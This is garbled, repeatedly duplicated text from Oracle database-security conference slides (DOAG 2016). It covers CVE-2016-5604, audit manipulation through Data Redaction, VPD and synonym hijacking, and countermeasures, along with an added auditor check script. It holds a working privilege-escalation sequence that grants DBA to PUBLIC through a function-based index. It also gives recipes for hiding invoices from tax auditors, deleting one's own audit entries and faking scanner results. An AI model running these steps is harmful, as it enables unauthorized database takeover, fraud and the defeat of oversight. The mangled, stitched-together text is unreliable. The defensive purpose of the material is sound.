Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions
Q & A
Thank you / Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  -- Database Vault fetches the SQL text under evaluation through the unqualified DUAL
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;
----- -----
SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA A VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
… where x=y
Where conditions can be changed using VPD (Virtual Private Database).
VPD adds a where clause: invoice_name = SAUNA_CLUB CHANTAL
Hide „certain“ invoices from the audit department.
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows an entire query to be replaced: the user submits Query A, and the SQL Translation Framework replaces Query A with Query B.
Possible Countermeasures for paranoid Auditors
- Add a random string (e.g. aksdjhiuz) to the query to avoid the SQL Translation Framework (new SQL_ID)
- Try to get EXEMPT ACCESS POLICY to disable VPD (even if it is not used in the application)
- Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
- Always check the object type (is it really a table?)
- Use checksums for certain database objects (especially views)
- Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
Modifying Queries on the fly
- Powerful features for applications
- (Huge) potential on critical systems to modify application logic (e.g. DB Vault)
- DBAs, auditors and the security department should be aware of powerful Oracle features which could be used to modify application logic
- Audit these features even if they are not in use
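As an added example that is not part of the slides, the countermeasures above and the advice to audit these features even when they are not in use, turned into an auditor's pre-flight script against the Oracle 12c data dictionary. The DBA_* views, REDACTION_POLICIES, SYS_CONTEXT and STANDARD_HASH are standard Oracle; the table name audit_baseline_views, the set of baselined views, the parameter name O7_DICTIONARY_ACCESSIBILITY and the run tag are assumptions chosen for this example.

```sql
-- Added example, not from the slides: auditor pre-flight checks, run as a user
-- with SELECT on the DBA_* views. AUDIT_BASELINE_VIEWS, the baselined views,
-- the parameter name and the run tag are assumptions made for this example.

-- 0. Hardened form of the checklist query: a fully qualified object instead of
--    a synonym, plus a per-run random tag in a comment so the statement gets a
--    fresh SQL_ID and no pre-registered SQL translation matches its text.
--    Regenerate the tag (here: aksdjhiuz) on every run.
SELECT /* run-tag: aksdjhiuz */ UPPER(value)
  FROM sys.v_$parameter
 WHERE UPPER(name) = 'O7_DICTIONARY_ACCESSIBILITY';  -- example parameter (assumption)

-- 1. Which user and schema is this session really running as?
--    CURRENT_SCHEMA may have been switched with ALTER SESSION SET CURRENT_SCHEMA.
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM sys.dual;

-- 2. Does the public synonym DUAL still resolve to SYS.DUAL, and is that a TABLE?
--    Expected: exactly one row reading SYS / DUAL / TABLE.
SELECT s.synonym_name, s.table_owner, s.table_name, o.object_type
  FROM sys.dba_synonyms s
  JOIN sys.dba_objects  o ON o.owner = s.table_owner AND o.object_name = s.table_name
 WHERE s.owner = 'PUBLIC' AND s.synonym_name = 'DUAL';

-- 3. Object type of everything the checklist queries by bare name:
--    a "table" that turns out to be a VIEW or a SYNONYM needs a closer look.
SELECT owner, object_name, object_type
  FROM sys.dba_objects
 WHERE object_name IN ('DUAL', 'AUD$', 'V_$PARAMETER')
 ORDER BY object_name, owner;

-- 4. Result- and query-rewriting features: list them even if "not in use".
SELECT 'DATA_REDACTION' AS feature, object_owner AS owner, object_name AS obj,
       policy_name, enable
  FROM sys.redaction_policies
UNION ALL
SELECT 'VPD', object_owner, object_name, policy_name, enable
  FROM sys.dba_policies
UNION ALL
SELECT 'SQL_TRANSLATION', owner, profile_name,
       CAST(NULL AS VARCHAR2(128)), CAST(NULL AS VARCHAR2(3))
  FROM sys.dba_sql_translation_profiles;

-- 5. A view standing in for a table shows up as an INSTEAD OF trigger.
SELECT owner, trigger_name, table_owner, table_name
  FROM sys.dba_triggers
 WHERE trigger_type = 'INSTEAD OF';

-- 6. Who may bypass VPD at all?
SELECT grantee
  FROM sys.dba_sys_privs
 WHERE privilege = 'EXEMPT ACCESS POLICY';

-- 7. Checksums of the dictionary views the audit depends on.
--    Baseline once on a known-good system (SHA-256 of the view text) ...
CREATE TABLE audit_baseline_views AS
SELECT owner, view_name, STANDARD_HASH(text_vc, 'SHA256') AS view_hash
  FROM sys.dba_views
 WHERE owner = 'SYS'
   AND view_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS', 'DBA_SYS_PRIVS', 'DBA_SYNONYMS');

--    ... then compare on every audit: any row returned is a changed definition.
SELECT v.owner, v.view_name
  FROM sys.dba_views v
  JOIN audit_baseline_views b ON b.owner = v.owner AND b.view_name = v.view_name
 WHERE STANDARD_HASH(v.text_vc, 'SHA256') <> b.view_hash;
```

Run the script from a dedicated auditing account rather than as SYS, and keep the baseline hashes outside the database being audited (an export of the table is enough), because the same privileges that can rewrite dba_audit_trail can rewrite a baseline stored next to it. TEXT_VC holds only the first 4000 characters of a view definition; for longer views hash the LONG TEXT column from PL/SQL (for example with DBMS_CRYPTO.HASH) instead of STANDARD_HASH.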
Trends 2017
- New hardening documents for Oracle 12.2 required (new features, new packages, …)
- Migration to 12.2
- More auditing projects
- Integration of auditing with SIEM solutions
Q & A
Thank you
Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
